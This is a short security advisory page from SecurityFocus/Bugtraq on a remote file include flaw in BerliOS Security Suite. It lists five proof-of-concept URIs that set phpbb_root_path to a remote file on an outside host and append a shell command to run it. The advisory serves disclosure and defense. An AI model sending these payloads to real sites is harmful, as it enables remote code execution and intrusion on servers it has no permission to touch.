Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

BerliOS Security Suite PHPBB_Root_Path Remote File Include Vulnerability

An attacker can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/includes/logger_engine.php?phpbb_root_path=http://www.example.com/c-h.v2.txt?ls
http://example.com/[path]/includes/mkb.php?phpbb_root_path=http://www.example.com/c-h.v2.txt?ls
http://example.com/[path]/includes/iplogger.php?phpbb_root_path=http://www.example.com/c-h.v2.txt?ls
http://example.com/[path]/includes/admin_board2.php?phpbb_root_path=http://www.example.com/c-h.v2.txt?ls
http://example.com/[path]/includes/admin_logger.php?phpbb_root_path=http://www.example.com/c-h.v2.txt?ls







 

Privacy Statement
Copyright 2008, SecurityFocus